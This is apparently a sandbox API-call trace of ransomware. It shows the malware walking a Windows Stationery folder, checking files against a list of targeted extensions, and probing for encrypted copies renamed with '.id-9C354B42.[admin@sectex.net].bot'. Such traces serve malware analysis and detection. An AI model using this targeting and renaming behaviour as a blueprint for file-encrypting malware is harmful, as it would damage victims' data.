	[0040.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.744] lstrlenW (lpString=".dbf") returned 4
	[0040.744] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1
	[0040.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.744] lstrlenW (lpString=".1cd") returned 4
	[0040.744] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1
	[0040.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.744] lstrlenW (lpString=".jpg") returned 4
	[0040.744] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1
	[0040.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.744] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.744] lstrlenW (lpString=".doc") returned 4
	[0040.744] lstrcmpiW (lpString1=".doc", lpString2=".gif") returned -1
	[0040.744] lstrlenW (lpString=".docx") returned 5
	[0040.744] lstrcmpiW (lpString1=".docx", lpString2="s.gif") returned -1
	[0040.744] lstrlenW (lpString=".pdf") returned 4
	[0040.744] lstrcmpiW (lpString1=".pdf", lpString2=".gif") returned 1
	[0040.744] lstrlenW (lpString=".xls") returned 4
	[0040.745] lstrcmpiW (lpString1=".xls", lpString2=".gif") returned 1
	[0040.745] lstrlenW (lpString=".xlsx") returned 5
	[0040.745] lstrcmpiW (lpString1=".xlsx", lpString2="s.gif") returned -1
	[0040.745] lstrlenW (lpString=".ppt") returned 4
	[0040.745] lstrcmpiW (lpString1=".ppt", lpString2=".gif") returned 1
	[0040.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.745] lstrlenW (lpString=".zip") returned 4
	[0040.745] lstrcmpiW (lpString1=".zip", lpString2=".gif") returned 1
	[0040.745] lstrlenW (lpString=".rar") returned 4
	[0040.745] lstrcmpiW (lpString1=".rar", lpString2=".gif") returned 1
	[0040.745] lstrlenW (lpString=".bz2") returned 4
	[0040.745] lstrcmpiW (lpString1=".bz2", lpString2=".gif") returned -1
	[0040.745] lstrlenW (lpString=".7z") returned 3
	[0040.745] lstrcmpiW (lpString1=".7z", lpString2="gif") returned -1
	[0040.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.745] lstrlenW (lpString=".dbf") returned 4
	[0040.745] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1
	[0040.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.745] lstrlenW (lpString=".1cd") returned 4
	[0040.745] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1
	[0040.745] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Cave_Drawings.gif") returned 75
	[0040.745] lstrlenW (lpString=".jpg") returned 4
	[0040.745] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1
	[0040.745] lstrcmpiW (lpString1=".htm", lpString2=".bot") returned 1
	[0040.745] lstrlenW (lpString="Green Bubbles.htm") returned 17
	[0040.745] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.012] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=237) returned 1
	[0042.012] CloseHandle (hObject=0x1f0) returned 1
	[0042.013] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm")) returned 0x20
	[0042.013] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.013] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\green bubbles.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0042.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.014] lstrlenW (lpString=".doc") returned 4
	[0042.014] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0042.014] lstrlenW (lpString=".docx") returned 5
	[0042.014] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1
	[0042.014] lstrlenW (lpString=".pdf") returned 4
	[0042.014] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0042.014] lstrlenW (lpString=".xls") returned 4
	[0042.014] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0042.014] lstrlenW (lpString=".xlsx") returned 5
	[0042.014] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1
	[0042.014] lstrlenW (lpString=".ppt") returned 4
	[0042.014] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0042.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.014] lstrlenW (lpString=".zip") returned 4
	[0042.014] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0042.014] lstrlenW (lpString=".rar") returned 4
	[0042.014] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0042.014] lstrlenW (lpString=".bz2") returned 4
	[0042.014] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0042.014] lstrlenW (lpString=".7z") returned 3
	[0042.014] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0042.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.014] lstrlenW (lpString=".dbf") returned 4
	[0042.014] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0042.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.014] lstrlenW (lpString=".1cd") returned 4
	[0042.014] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0042.014] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.014] lstrlenW (lpString=".jpg") returned 4
	[0042.015] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0042.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.015] lstrlenW (lpString=".doc") returned 4
	[0042.015] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0042.015] lstrlenW (lpString=".docx") returned 5
	[0042.015] lstrcmpiW (lpString1=".docx", lpString2="s.htm") returned -1
	[0042.015] lstrlenW (lpString=".pdf") returned 4
	[0042.015] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0042.015] lstrlenW (lpString=".xls") returned 4
	[0042.015] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0042.015] lstrlenW (lpString=".xlsx") returned 5
	[0042.015] lstrcmpiW (lpString1=".xlsx", lpString2="s.htm") returned -1
	[0042.015] lstrlenW (lpString=".ppt") returned 4
	[0042.015] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0042.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.015] lstrlenW (lpString=".zip") returned 4
	[0042.015] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0042.015] lstrlenW (lpString=".rar") returned 4
	[0042.015] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0042.015] lstrlenW (lpString=".bz2") returned 4
	[0042.015] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0042.015] lstrlenW (lpString=".7z") returned 3
	[0042.015] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0042.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.015] lstrlenW (lpString=".dbf") returned 4
	[0042.015] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0042.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.015] lstrlenW (lpString=".1cd") returned 4
	[0042.015] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0042.015] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Green Bubbles.htm") returned 75
	[0042.015] lstrlenW (lpString=".jpg") returned 4
	[0042.015] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0042.016] lstrcmpiW (lpString1=".jpg", lpString2=".bot") returned 1
	[0042.016] lstrlenW (lpString="Sand_Paper.jpg") returned 14
	[0042.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.016] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=15776) returned 1
	[0042.016] CloseHandle (hObject=0x1f0) returned 1
	[0042.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg")) returned 0x20
	[0042.016] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.016] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0042.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.016] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.016] lstrlenW (lpString=".doc") returned 4
	[0042.016] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0042.016] lstrlenW (lpString=".docx") returned 5
	[0042.016] lstrcmpiW (lpString1=".docx", lpString2="r.jpg") returned -1
	[0042.016] lstrlenW (lpString=".pdf") returned 4
	[0042.016] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0042.016] lstrlenW (lpString=".xls") returned 4
	[0042.017] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0042.017] lstrlenW (lpString=".xlsx") returned 5
	[0042.017] lstrcmpiW (lpString1=".xlsx", lpString2="r.jpg") returned -1
	[0042.017] lstrlenW (lpString=".ppt") returned 4
	[0042.017] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0042.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.017] lstrlenW (lpString=".zip") returned 4
	[0042.017] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0042.017] lstrlenW (lpString=".rar") returned 4
	[0042.017] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0042.017] lstrlenW (lpString=".bz2") returned 4
	[0042.017] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0042.017] lstrlenW (lpString=".7z") returned 3
	[0042.017] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0042.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.017] lstrlenW (lpString=".dbf") returned 4
	[0042.017] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0042.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.017] lstrlenW (lpString=".1cd") returned 4
	[0042.017] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0042.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.017] lstrlenW (lpString=".jpg") returned 4
	[0042.017] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0042.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.017] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.017] lstrlenW (lpString=".doc") returned 4
	[0042.018] lstrcmpiW (lpString1=".doc", lpString2=".jpg") returned -1
	[0042.018] lstrlenW (lpString=".docx") returned 5
	[0042.018] lstrcmpiW (lpString1=".docx", lpString2="r.jpg") returned -1
	[0042.018] lstrlenW (lpString=".pdf") returned 4
	[0042.018] lstrcmpiW (lpString1=".pdf", lpString2=".jpg") returned 1
	[0042.018] lstrlenW (lpString=".xls") returned 4
	[0042.018] lstrcmpiW (lpString1=".xls", lpString2=".jpg") returned 1
	[0042.018] lstrlenW (lpString=".xlsx") returned 5
	[0042.018] lstrcmpiW (lpString1=".xlsx", lpString2="r.jpg") returned -1
	[0042.018] lstrlenW (lpString=".ppt") returned 4
	[0042.018] lstrcmpiW (lpString1=".ppt", lpString2=".jpg") returned 1
	[0042.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.018] lstrlenW (lpString=".zip") returned 4
	[0042.018] lstrcmpiW (lpString1=".zip", lpString2=".jpg") returned 1
	[0042.018] lstrlenW (lpString=".rar") returned 4
	[0042.018] lstrcmpiW (lpString1=".rar", lpString2=".jpg") returned 1
	[0042.018] lstrlenW (lpString=".bz2") returned 4
	[0042.018] lstrcmpiW (lpString1=".bz2", lpString2=".jpg") returned -1
	[0042.018] lstrlenW (lpString=".7z") returned 3
	[0042.018] lstrcmpiW (lpString1=".7z", lpString2="jpg") returned -1
	[0042.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.018] lstrlenW (lpString=".dbf") returned 4
	[0042.018] lstrcmpiW (lpString1=".dbf", lpString2=".jpg") returned -1
	[0042.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.018] lstrlenW (lpString=".1cd") returned 4
	[0042.018] lstrcmpiW (lpString1=".1cd", lpString2=".jpg") returned -1
	[0042.018] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg") returned 72
	[0042.018] lstrlenW (lpString=".jpg") returned 4
	[0042.018] lstrcmpiW (lpString1=".jpg", lpString2=".jpg") returned 0
	[0042.019] lstrcmpiW (lpString1=".emf", lpString2=".bot") returned 1
	[0042.019] lstrlenW (lpString="Seyes.emf") returned 9
	[0042.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.019] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=37316) returned 1
	[0042.019] CloseHandle (hObject=0x1f0) returned 1
	[0042.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf")) returned 0x20
	[0042.019] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.019] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0042.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.019] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.019] lstrlenW (lpString=".doc") returned 4
	[0042.019] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0042.019] lstrlenW (lpString=".docx") returned 5
	[0042.019] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1
	[0042.019] lstrlenW (lpString=".pdf") returned 4
	[0042.019] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0042.019] lstrlenW (lpString=".xls") returned 4
	[0042.019] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0042.019] lstrlenW (lpString=".xlsx") returned 5
	[0042.019] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1
	[0042.019] lstrlenW (lpString=".ppt") returned 4
	[0042.019] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0042.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.020] lstrlenW (lpString=".zip") returned 4
	[0042.020] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0042.020] lstrlenW (lpString=".rar") returned 4
	[0042.020] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0042.020] lstrlenW (lpString=".bz2") returned 4
	[0042.020] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0042.020] lstrlenW (lpString=".7z") returned 3
	[0042.020] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0042.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.020] lstrlenW (lpString=".dbf") returned 4
	[0042.020] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0042.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.020] lstrlenW (lpString=".1cd") returned 4
	[0042.020] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0042.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.020] lstrlenW (lpString=".jpg") returned 4
	[0042.020] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0042.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.020] lstrlenW (lpString=".doc") returned 4
	[0042.020] lstrcmpiW (lpString1=".doc", lpString2=".emf") returned -1
	[0042.020] lstrlenW (lpString=".docx") returned 5
	[0042.020] lstrcmpiW (lpString1=".docx", lpString2="s.emf") returned -1
	[0042.020] lstrlenW (lpString=".pdf") returned 4
	[0042.020] lstrcmpiW (lpString1=".pdf", lpString2=".emf") returned 1
	[0042.020] lstrlenW (lpString=".xls") returned 4
	[0042.020] lstrcmpiW (lpString1=".xls", lpString2=".emf") returned 1
	[0042.020] lstrlenW (lpString=".xlsx") returned 5
	[0042.020] lstrcmpiW (lpString1=".xlsx", lpString2="s.emf") returned -1
	[0042.020] lstrlenW (lpString=".ppt") returned 4
	[0042.020] lstrcmpiW (lpString1=".ppt", lpString2=".emf") returned 1
	[0042.020] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.020] lstrlenW (lpString=".zip") returned 4
	[0042.021] lstrcmpiW (lpString1=".zip", lpString2=".emf") returned 1
	[0042.021] lstrlenW (lpString=".rar") returned 4
	[0042.021] lstrcmpiW (lpString1=".rar", lpString2=".emf") returned 1
	[0042.021] lstrlenW (lpString=".bz2") returned 4
	[0042.021] lstrcmpiW (lpString1=".bz2", lpString2=".emf") returned -1
	[0042.021] lstrlenW (lpString=".7z") returned 3
	[0042.021] lstrcmpiW (lpString1=".7z", lpString2="emf") returned -1
	[0042.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.021] lstrlenW (lpString=".dbf") returned 4
	[0042.021] lstrcmpiW (lpString1=".dbf", lpString2=".emf") returned -1
	[0042.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.021] lstrlenW (lpString=".1cd") returned 4
	[0042.021] lstrcmpiW (lpString1=".1cd", lpString2=".emf") returned -1
	[0042.021] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf") returned 67
	[0042.021] lstrlenW (lpString=".jpg") returned 4
	[0042.021] lstrcmpiW (lpString1=".jpg", lpString2=".emf") returned 1
	[0042.021] lstrcmpiW (lpString1=".htm", lpString2=".bot") returned 1
	[0042.021] lstrlenW (lpString="Shades of Blue.htm") returned 18
	[0042.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.021] GetFileSizeEx (in: hFile=0x1f0, lpFileSize=0xa19ff1c | out: lpFileSize=0xa19ff1c*=237) returned 1
	[0042.021] CloseHandle (hObject=0x1f0) returned 1
	[0042.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm")) returned 0x20
	[0042.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0042.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.022] lstrlenW (lpString=".doc") returned 4
	[0042.022] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0042.022] lstrlenW (lpString=".docx") returned 5
	[0042.022] lstrcmpiW (lpString1=".docx", lpString2="e.htm") returned -1
	[0042.022] lstrlenW (lpString=".pdf") returned 4
	[0042.022] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0042.022] lstrlenW (lpString=".xls") returned 4
	[0042.022] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0042.022] lstrlenW (lpString=".xlsx") returned 5
	[0042.022] lstrcmpiW (lpString1=".xlsx", lpString2="e.htm") returned -1
	[0042.022] lstrlenW (lpString=".ppt") returned 4
	[0042.022] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0042.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.022] lstrlenW (lpString=".zip") returned 4
	[0042.022] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0042.022] lstrlenW (lpString=".rar") returned 4
	[0042.022] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0042.022] lstrlenW (lpString=".bz2") returned 4
	[0042.022] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0042.022] lstrlenW (lpString=".7z") returned 3
	[0042.022] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0042.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.022] lstrlenW (lpString=".dbf") returned 4
	[0042.022] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
	[0042.022] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.022] lstrlenW (lpString=".1cd") returned 4
	[0042.022] lstrcmpiW (lpString1=".1cd", lpString2=".htm") returned -1
	[0042.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.023] lstrlenW (lpString=".jpg") returned 4
	[0042.023] lstrcmpiW (lpString1=".jpg", lpString2=".htm") returned 1
	[0042.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.023] lstrlenW (lpString=".doc") returned 4
	[0042.023] lstrcmpiW (lpString1=".doc", lpString2=".htm") returned -1
	[0042.023] lstrlenW (lpString=".docx") returned 5
	[0042.023] lstrcmpiW (lpString1=".docx", lpString2="e.htm") returned -1
	[0042.023] lstrlenW (lpString=".pdf") returned 4
	[0042.023] lstrcmpiW (lpString1=".pdf", lpString2=".htm") returned 1
	[0042.023] lstrlenW (lpString=".xls") returned 4
	[0042.023] lstrcmpiW (lpString1=".xls", lpString2=".htm") returned 1
	[0042.023] lstrlenW (lpString=".xlsx") returned 5
	[0042.023] lstrcmpiW (lpString1=".xlsx", lpString2="e.htm") returned -1
	[0042.023] lstrlenW (lpString=".ppt") returned 4
	[0042.023] lstrcmpiW (lpString1=".ppt", lpString2=".htm") returned 1
	[0042.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.023] lstrlenW (lpString=".zip") returned 4
	[0042.023] lstrcmpiW (lpString1=".zip", lpString2=".htm") returned 1
	[0042.023] lstrlenW (lpString=".rar") returned 4
	[0042.023] lstrcmpiW (lpString1=".rar", lpString2=".htm") returned 1
	[0042.023] lstrlenW (lpString=".bz2") returned 4
	[0042.023] lstrcmpiW (lpString1=".bz2", lpString2=".htm") returned -1
	[0042.023] lstrlenW (lpString=".7z") returned 3
	[0042.023] lstrcmpiW (lpString1=".7z", lpString2="htm") returned -1
	[0042.023] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm") returned 76
	[0042.023] lstrlenW (lpString=".dbf") returned 4
	[0042.023] lstrcmpiW (lpString1=".dbf", lpString2=".htm") returned -1
